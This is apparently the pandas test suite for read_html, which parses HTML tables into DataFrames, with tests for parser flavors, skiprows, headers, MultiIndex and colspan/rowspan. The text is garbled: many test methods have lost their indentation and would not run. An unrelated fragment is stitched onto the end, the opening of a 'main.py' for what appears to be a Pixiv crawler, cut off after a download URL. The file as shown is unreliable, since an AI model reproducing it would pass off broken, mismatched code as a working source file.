    """Assert two lists contain pairwise-equal, non-empty DataFrames.

    Extra args/kwargs are forwarded to tm.assert_frame_equal.
    """
    assert len(list1) == len(list2), ('lists are not of equal size '
                                      'len(list1) == {0}, '
                                      'len(list2) == {1}'.format(len(list1),
                                                                 len(list2)))
    msg = 'not all list elements are DataFrames'
    both_frames = all(map(lambda x, y: isinstance(x, DataFrame) and
                          isinstance(y, DataFrame), list1, list2))
    assert both_frames, msg
    for left, right in zip(list1, list2):
        tm.assert_frame_equal(left, right, *args, **kwargs)
        assert not left.empty, 'frames are both empty'
@td.skip_if_no('bs4')
def test_bs4_version_fails(monkeypatch, datapath):
    """read_html must reject BeautifulSoup versions below the minimum."""
    import bs4
    # pretend an old bs4 is installed
    monkeypatch.setattr(bs4, '__version__', '4.2')
    with tm.assert_raises_regex(ValueError, "minimum version"):
        read_html(datapath("io", "data", "spam.html"), flavor='bs4')
def test_invalid_flavor():
    """An unknown flavor must raise a descriptive ValueError."""
    url = "google.com"
    flavor = "invalid flavor"
    expected_msg = r"\{" + flavor + r"\} is not a valid set of flavors"
    with tm.assert_raises_regex(ValueError, expected_msg):
        read_html(url, "google", flavor=flavor)
@td.skip_if_no('bs4')
@td.skip_if_no('lxml')
def test_same_ordering(datapath):
    """lxml and bs4 flavors must return tables in the same order."""
    filename = datapath('io', 'data', 'valid_markup.html')
    parsed = {flav: read_html(filename, index_col=0, flavor=[flav])
              for flav in ('lxml', 'bs4')}
    assert_framelist_equal(parsed['lxml'], parsed['bs4'])
# run the whole class once per parser flavor
# NOTE(review): the 'bs4' param's skipif tests td.safe_import('lxml')
# while its reason says 'No bs4' — looks like a copy-paste slip; confirm
# whether the bs4 flavor genuinely requires lxml here.
@pytest.mark.parametrize("flavor", [
    pytest.param('bs4', marks=pytest.mark.skipif(
        not td.safe_import('lxml'), reason='No bs4')),
    pytest.param('lxml', marks=pytest.mark.skipif(
        not td.safe_import('lxml'), reason='No lxml'))], scope="class")
class TestReadHtml(object):
    @pytest.fixture(autouse=True)
    def set_files(self, datapath):
        """Resolve the fixture HTML files used by most tests."""
        self.spam_data = datapath('io', 'data', 'spam.html')
        self.spam_data_kwargs = {}
        if PY3:
            # Python 3 open() needs an explicit encoding for these files
            self.spam_data_kwargs['encoding'] = 'UTF-8'
        self.banklist_data = datapath("io", "data", "banklist.html")

    @pytest.fixture(autouse=True, scope="function")
    def set_defaults(self, flavor, request):
        """Bind self.read_html to read_html pinned to the current flavor."""
        self.read_html = partial(read_html, flavor=flavor)
        yield
def test_to_html_compat(self):
df = mkdf(4, 3, data_gen_f=lambda *args: rand(), c_idx_names=False,
r_idx_names=False).applymap('{0:.3f}'.format).astype(float)
out = df.to_html()
res = self.read_html(out, attrs={'class': 'dataframe'}, index_col=0)[0]
tm.assert_frame_equal(res, df)
    @network
    def test_banklist_url(self):
        """Two different match patterns over the live FDIC page agree."""
        url = 'http://www.fdic.gov/bank/individual/failed/banklist.html'
        df1 = self.read_html(url, 'First Federal Bank of Florida',
                             attrs={"id": 'table'})
        df2 = self.read_html(url, 'Metcalf Bank', attrs={'id': 'table'})
        assert_framelist_equal(df1, df2)

    @network
    def test_spam_url(self):
        """Two different match patterns over the live USDA page agree."""
        url = ('http://ndb.nal.usda.gov/ndb/foods/show/300772?fg=&man=&'
               'lfacet=&format=&count=&max=25&offset=&sort=&qlookup=spam')
        df1 = self.read_html(url, '.*Water.*')
        df2 = self.read_html(url, 'Unit')
        assert_framelist_equal(df1, df2)
    @pytest.mark.slow
    def test_banklist(self):
        """Different match patterns select the same banklist table."""
        df1 = self.read_html(self.banklist_data, '.*Florida.*',
                             attrs={'id': 'table'})
        df2 = self.read_html(self.banklist_data, 'Metcalf Bank',
                             attrs={'id': 'table'})
        assert_framelist_equal(df1, df2)

    def test_spam(self):
        """Different match patterns select the same spam table; spot-check
        the first cell and column label."""
        df1 = self.read_html(self.spam_data, '.*Water.*')
        df2 = self.read_html(self.spam_data, 'Unit')
        assert_framelist_equal(df1, df2)
        assert df1[0].iloc[0, 0] == 'Proximates'
        assert df1[0].columns[0] == 'Nutrient'
    def test_spam_no_match(self):
        """Without a match pattern every parsed table is a DataFrame."""
        dfs = self.read_html(self.spam_data)
        for df in dfs:
            assert isinstance(df, DataFrame)

    def test_banklist_no_match(self):
        """attrs-only selection still yields DataFrames."""
        dfs = self.read_html(self.banklist_data, attrs={'id': 'table'})
        for df in dfs:
            assert isinstance(df, DataFrame)

    def test_spam_header(self):
        """header=2 promotes the third row to column labels."""
        df = self.read_html(self.spam_data, '.*Water.*', header=2)[0]
        assert df.columns[0] == 'Proximates'
        assert not df.empty
    # The following tests exercise every accepted type for skiprows;
    # each compares two equivalent reads of the same table.
    def test_skiprows_int(self):
        """skiprows as a plain int."""
        df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
        df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
        assert_framelist_equal(df1, df2)

    def test_skiprows_xrange(self):
        """skiprows as a range."""
        df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=range(2))[0]
        df2 = self.read_html(self.spam_data, 'Unit', skiprows=range(2))[0]
        tm.assert_frame_equal(df1, df2)

    def test_skiprows_list(self):
        """skiprows as a list (order must not matter)."""
        df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=[1, 2])
        df2 = self.read_html(self.spam_data, 'Unit', skiprows=[2, 1])
        assert_framelist_equal(df1, df2)

    def test_skiprows_set(self):
        """skiprows as a set."""
        df1 = self.read_html(self.spam_data, '.*Water.*', skiprows={1, 2})
        df2 = self.read_html(self.spam_data, 'Unit', skiprows={2, 1})
        assert_framelist_equal(df1, df2)

    def test_skiprows_slice(self):
        """skiprows int baseline used by the slice variants below."""
        df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=1)
        df2 = self.read_html(self.spam_data, 'Unit', skiprows=1)
        assert_framelist_equal(df1, df2)

    def test_skiprows_slice_short(self):
        """skiprows as a stop-only slice."""
        df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2))
        df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(2))
        assert_framelist_equal(df1, df2)

    def test_skiprows_slice_long(self):
        """skiprows as start/stop slices (forward and reversed)."""
        df1 = self.read_html(self.spam_data, '.*Water.*', skiprows=slice(2, 5))
        df2 = self.read_html(self.spam_data, 'Unit', skiprows=slice(4, 1, -1))
        assert_framelist_equal(df1, df2)

    def test_skiprows_ndarray(self):
        """skiprows as a numpy array."""
        df1 = self.read_html(self.spam_data, '.*Water.*',
                             skiprows=np.arange(2))
        df2 = self.read_html(self.spam_data, 'Unit', skiprows=np.arange(2))
        assert_framelist_equal(df1, df2)

    def test_skiprows_invalid(self):
        """A string is not an accepted skiprows type."""
        with tm.assert_raises_regex(TypeError, 'is not a valid type '
                                    'for skipping rows'):
            self.read_html(self.spam_data, '.*Water.*', skiprows='asdf')
    def test_index(self):
        """index_col=0 is applied consistently across match patterns."""
        df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
        df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
        assert_framelist_equal(df1, df2)

    def test_header_and_index_no_types(self):
        """header + index_col combination, untyped comparison."""
        df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
                             index_col=0)
        df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
        assert_framelist_equal(df1, df2)

    def test_header_and_index_with_types(self):
        """Same as above; kept for symmetry with the historical typed API."""
        df1 = self.read_html(self.spam_data, '.*Water.*', header=1,
                             index_col=0)
        df2 = self.read_html(self.spam_data, 'Unit', header=1, index_col=0)
        assert_framelist_equal(df1, df2)

    def test_infer_types(self):
        # 10892 infer_types removed
        df1 = self.read_html(self.spam_data, '.*Water.*', index_col=0)
        df2 = self.read_html(self.spam_data, 'Unit', index_col=0)
        assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, '.*Water.*')
df2 = self.read_html(data2, 'Unit')
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, '.*Water.*')
df2 = self.read_html(data, 'Unit')
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, '.*Water.*')
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, 'Unit')
assert_framelist_equal(df1, df2)
    @network
    def test_bad_url_protocol(self):
        """An unsupported URL scheme raises URLError."""
        with pytest.raises(URLError):
            self.read_html('git://github.com', match='.*Water.*')

    @network
    def test_invalid_url(self):
        """A non-resolvable host raises URLError (or 'No tables found'
        depending on how the fetch fails)."""
        try:
            with pytest.raises(URLError):
                self.read_html('http://www.a23950sdfa908sd.com',
                               match='.*Water.*')
        except ValueError as e:
            assert 'No tables found' in str(e)

    @pytest.mark.slow
    def test_file_url(self):
        """read_html accepts file:// URLs."""
        url = self.banklist_data
        dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
                             'First',
                             attrs={'id': 'table'})
        assert isinstance(dfs, list)
        for df in dfs:
            assert isinstance(df, DataFrame)

    @pytest.mark.slow
    def test_invalid_table_attrs(self):
        """attrs that match no table raise 'No tables found'."""
        url = self.banklist_data
        with tm.assert_raises_regex(ValueError, 'No tables found'):
            self.read_html(url, 'First Federal Bank of Florida',
                           attrs={'id': 'tasdfable'})
def _bank_data(self, *args, **kwargs):
return self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'}, *args, **kwargs)
    @pytest.mark.slow
    def test_multiindex_header(self):
        """Two header rows produce MultiIndex columns."""
        df = self._bank_data(header=[0, 1])[0]
        assert isinstance(df.columns, MultiIndex)

    @pytest.mark.slow
    def test_multiindex_index(self):
        """Two index columns produce a MultiIndex index."""
        df = self._bank_data(index_col=[0, 1])[0]
        assert isinstance(df.index, MultiIndex)

    @pytest.mark.slow
    def test_multiindex_header_index(self):
        """Both columns and index can be MultiIndex simultaneously."""
        df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
        assert isinstance(df.columns, MultiIndex)
        assert isinstance(df.index, MultiIndex)

    @pytest.mark.slow
    def test_multiindex_header_skiprows_tuples(self):
        """Deprecated tupleize_cols=True flattens headers into an Index."""
        with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
            df = self._bank_data(header=[0, 1], skiprows=1,
                                 tupleize_cols=True)[0]
        assert isinstance(df.columns, Index)

    @pytest.mark.slow
    def test_multiindex_header_skiprows(self):
        """skiprows keeps MultiIndex columns intact."""
        df = self._bank_data(header=[0, 1], skiprows=1)[0]
        assert isinstance(df.columns, MultiIndex)

    @pytest.mark.slow
    def test_multiindex_header_index_skiprows(self):
        """skiprows with both MultiIndex columns and index."""
        df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
        assert isinstance(df.index, MultiIndex)
        assert isinstance(df.columns, MultiIndex)

    @pytest.mark.slow
    def test_regex_idempotency(self):
        """A pre-compiled regex match behaves like a pattern string."""
        url = self.banklist_data
        dfs = self.read_html(file_path_to_url(os.path.abspath(url)),
                             match=re.compile(re.compile('Florida')),
                             attrs={'id': 'table'})
        assert isinstance(dfs, list)
        for df in dfs:
            assert isinstance(df, DataFrame)
    def test_negative_skiprows(self):
        """Negative skiprows values are rejected."""
        with tm.assert_raises_regex(ValueError,
                                    r'\(you passed a negative value\)'):
            self.read_html(self.spam_data, 'Water', skiprows=-1)

    @network
    def test_multiple_matches(self):
        """A broad match pattern returns more than one table."""
        url = 'https://docs.python.org/2/'
        dfs = self.read_html(url, match='Python')
        assert len(dfs) > 1

    @network
    def test_python_docs_table(self):
        """Spot-check the first cells of the python.org doc tables."""
        url = 'https://docs.python.org/2/'
        dfs = self.read_html(url, match='Python')
        zz = [df.iloc[0, 0][0:4] for df in dfs]
        assert sorted(zz) == sorted(['Repo', 'What'])

    @pytest.mark.slow
    def test_thousands_macau_stats(self, datapath):
        """Thousands separators parse to numbers (no NaNs) via attrs."""
        all_non_nan_table_index = -2
        macau_data = datapath("io", "data", "macau.html")
        dfs = self.read_html(macau_data, index_col=0,
                             attrs={'class': 'style1'})
        df = dfs[all_non_nan_table_index]
        assert not any(s.isna().any() for _, s in df.iteritems())

    @pytest.mark.slow
    def test_thousands_macau_index_col(self, datapath):
        """Same fixture parsed via header/index_col instead of attrs."""
        all_non_nan_table_index = -2
        macau_data = datapath('io', 'data', 'macau.html')
        dfs = self.read_html(macau_data, index_col=0, header=0)
        df = dfs[all_non_nan_table_index]
        assert not any(s.isna().any() for _, s in df.iteritems())
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
result = self.read_html('''
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
''')
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html('''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data={'Header': 'first'}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html('''<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>''')[0]
expected = DataFrame(data=[['Ukraine', 'Odessa', 1944]],
columns=['Country', 'Municipality', 'Year'])
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = '''<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>'''
expected1 = DataFrame(data=[['bodyA', 'bodyB']], columns=['A', 'B'])
expected2 = DataFrame(data=[['bodyA', 'bodyB'], ['footA', 'footB']],
columns=['A', 'B'])
data1 = data_template.format(footer="")
data2 = data_template.format(
footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html('''
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
''', header=0)[0]
expected = DataFrame([['text', 1944]], columns=('S', 'I'))
tm.assert_frame_equal(result, expected)
def test_nyse_wsj_commas_table(self, datapath):
data = datapath('io', 'data', 'nyse_wsj.html')
df = self.read_html(data, index_col=0, header=0,
attrs={'class': 'mdcTable'})[0]
expected = Index(['Issue(Roll over for charts and headlines)',
'Volume', 'Price', 'Chg', '% Chg'])
nrows = 100
assert df.shape[0] == nrows
tm.assert_index_equal(df.columns, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, 'Metcalf',
attrs={'id': 'table'})[0]
ground_truth = read_csv(datapath('io', 'data', 'banklist.csv'),
converters={'Updated Date': Timestamp,
'Closing Date': Timestamp})
assert df.shape == ground_truth.shape
old = ['First Vietnamese American BankIn Vietnamese',
'Westernbank Puerto RicoEn Espanol',
'R-G Premier Bank of Puerto RicoEn Espanol',
'EurobankEn Espanol', 'Sanderson State BankEn Espanol',
'Washington Mutual Bank(Including its subsidiary Washington '
'Mutual Bank FSB)',
'Silver State BankEn Espanol',
'AmTrade International BankEn Espanol',
'Hamilton Bank, NAEn Espanol',
'The Citizens Savings BankPioneer Community Bank, Inc.']
new = ['First Vietnamese American Bank', 'Westernbank Puerto Rico',
'R-G Premier Bank of Puerto Rico', 'Eurobank',
'Sanderson State Bank', 'Washington Mutual Bank',
'Silver State Bank', 'AmTrade International Bank',
'Hamilton Bank, NA', 'The Citizens Savings Bank']
dfnew = df.applymap(try_remove_ws).replace(old, new)
gtnew = ground_truth.applymap(try_remove_ws)
converted = dfnew._convert(datetime=True, numeric=True)
date_cols = ['Closing Date', 'Updated Date']
converted[date_cols] = converted[date_cols]._convert(datetime=True,
coerce=True)
tm.assert_frame_equal(converted, gtnew)
@pytest.mark.slow
def test_gold_canyon(self):
gc = 'Gold Canyon'
with open(self.banklist_data, 'r') as f:
raw_text = f.read()
assert gc in raw_text
df = self.read_html(self.banklist_data, 'Gold Canyon',
attrs={'id': 'table'})[0]
assert gc in df.to_string()
def test_different_number_of_cols(self):
expected = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
<td> nan</td>
<td> nan</td>
<td> nan</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
result = self.read_html("""<table>
<thead>
<tr style="text-align: right;">
<th></th>
<th>C_l0_g0</th>
<th>C_l0_g1</th>
<th>C_l0_g2</th>
<th>C_l0_g3</th>
<th>C_l0_g4</th>
</tr>
</thead>
<tbody>
<tr>
<th>R_l0_g0</th>
<td> 0.763</td>
<td> 0.233</td>
</tr>
<tr>
<th>R_l0_g1</th>
<td> 0.244</td>
<td> 0.285</td>
<td> 0.392</td>
<td> 0.137</td>
<td> 0.222</td>
</tr>
</tbody>
</table>""", index_col=0)[0]
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_1(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th colspan="1">B</th>
<th rowspan="1">C</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
<td>c</td>
</tr>
</table>
""")[0]
expected = DataFrame([['a', 'b', 'c']], columns=['A', 'B', 'C'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_copy_values(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# X x Y Z W
# A B b z C
result = self.read_html("""
<table>
<tr>
<td colspan="2">X</td>
<td>Y</td>
<td rowspan="2">Z</td>
<td>W</td>
</tr>
<tr>
<td>A</td>
<td colspan="2">B</td>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'Z', 'C']],
columns=['X', 'X.1', 'Y', 'Z', 'W'])
tm.assert_frame_equal(result, expected)
def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html("""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'B', 'D']],
columns=['A', 'B', 'B.1', 'B.2', 'C'])
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html("""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['C', 'B']], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B'], ['A', 'B']],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
labels=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({'date': date_range('1/1/2001', periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=['date'], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range('1/1/2001', periods=10))
df = DataFrame({'date': raw_dates.map(lambda x: str(x.date())),
'time': raw_dates.map(lambda x: str(x.time()))})
res = self.read_html(df.to_html(), parse_dates={'datetime': [1, 2]},
index_col=1)
newdf = DataFrame({'datetime': raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath('io', 'data', 'computer_sales_page.html')
with tm.assert_raises_regex(ParserError,
r"Passed header=\[0,1\] are "
r"too many rows for this "
r"multi_index of columns"):
self.read_html(data, header=[0, 1])
data = datapath('io', 'data', 'computer_sales_page.html')
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath('io', 'data', 'wikipedia_states.html')
assert os.path.isfile(data), '%r is not a file' % data
assert os.path.getsize(data), '%r is an empty file' % data
result = self.read_html(data, 'Arizona', header=1)[0]
assert result['sq mi'].dtype == np.dtype('float64')
def test_parser_error_on_empty_header_row(self):
with tm.assert_raises_regex(ParserError,
r"Passed header=\[0,1\] are "
r"too many rows for this "
r"multi_index of columns"):
self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""", header=[0, 1])
def test_decimal_rows(self):
# GH 12907
result = self.read_html('''<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>''', decimal='#')[0]
expected = DataFrame(data={'Header': 1100.101}, index=[0])
assert result['Header'].dtype == np.dtype('float64')
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={'a': str}
)[0]
expected = DataFrame({'a': ['0.763', '0.244']})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244])[0]
expected = DataFrame({'a': [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({'a': ['N/A', 'NA']})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({'a': [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
""")[0]
expected = DataFrame(data=[['a', 'b'], [np.nan, np.nan]],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
labels=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(data=[("Hillary", 68, "D"),
("Bernie", 74, "D"),
("Donald", 69, "R")])
expected_df.columns = [["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1",
"Unnamed: 2_level_1"]]
html = expected_df.to_html(index=False)
html_df = self.read_html(html, )[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath('io', 'data', 'banklist.html')
self.read_html(banklist_data, '.*Water.*', flavor=['lxml', 'html5lib'])
def test_to_html_timestamp(self):
rng = date_range('2000-01-01', periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert '2000-01-01' in result
@pytest.mark.parametrize("displayed_only,exp0,exp1", [
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"]))])
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO("""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>""")
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
_, encoding = os.path.splitext(
os.path.basename(html_encoding_file)
)[0].split('_')
try:
with open(html_encoding_file, 'rb') as fobj:
from_string = self.read_html(fobj.read(), encoding=encoding,
index_col=0).pop()
with open(html_encoding_file, 'rb') as fobj:
from_file_like = self.read_html(BytesIO(fobj.read()),
encoding=encoding,
index_col=0).pop()
from_filename = self.read_html(html_encoding_file,
encoding=encoding,
index_col=0).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if '16' in encoding or '32' in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
    # Issue #17975
    #
    # When the first flavor fails to parse, read_html retries with the next
    # flavor, which requires rewinding the input; a non-seekable stream must
    # instead produce a clear ValueError. lxml recovers from the bad markup
    # on its own, so the scenario does not apply to it.
    if self.read_html.keywords.get('flavor') == 'lxml':
        pytest.skip("Not applicable for lxml")

    class UnseekableStringIO(StringIO):
        # Pretend the stream cannot be rewound.
        def seekable(self):
            return False

    bad = UnseekableStringIO('''
<table><tr><td>spam<foobr />eggs</td></tr></table>''')
    assert self.read_html(bad)
    with pytest.raises(ValueError,
                       match='passed a non-rewindable file object'):
        self.read_html(bad)
def test_parse_failure_rewinds(self):
    # Issue #17975
    #
    # After a failed parse with one flavor, read_html must seek the file-like
    # object back to the start before retrying with the next flavor.

    class MockFile(object):
        # Minimal seekable file stub: one read drains it, seek refills it.
        def __init__(self, data):
            self.data = data
            self.at_end = False

        def read(self, size=None):
            data = '' if self.at_end else self.data
            self.at_end = True
            return data

        def seek(self, offset):
            self.at_end = False

        def seekable(self):
            return True

    good = MockFile('<table><tr><td>spam<br />eggs</td></tr></table>')
    bad = MockFile('<table><tr><td>spam<foobr />eggs</td></tr></table>')
    assert self.read_html(good)
    assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
    # see gh-16928
    #
    # Two threads re-run read_html concurrently after the module-level import
    # check state has been reset; neither may raise.

    class ErrorThread(threading.Thread):
        # Thread subclass that records any exception from its target in .err.
        def run(self):
            try:
                super(ErrorThread, self).run()
            except Exception as e:
                self.err = e
            else:
                self.err = None

    # force import check by reinitalising global vars in html.py
    reload(pandas.io.html)
    filename = datapath('io', 'data', 'valid_markup.html')
    helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
    helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
    helper_thread1.start()
    helper_thread2.start()
    # join() blocks without burning a CPU core, unlike the previous
    # `while is_alive(): pass` spin-wait.
    helper_thread1.join()
    helper_thread2.join()
    assert None is helper_thread1.err is helper_thread2.err
|
main.py | import requests
import threading
import os
import time
link_url = "https://raw.githubusercontent.com/codingbox/Pixiv-Craw/main/url.txt"


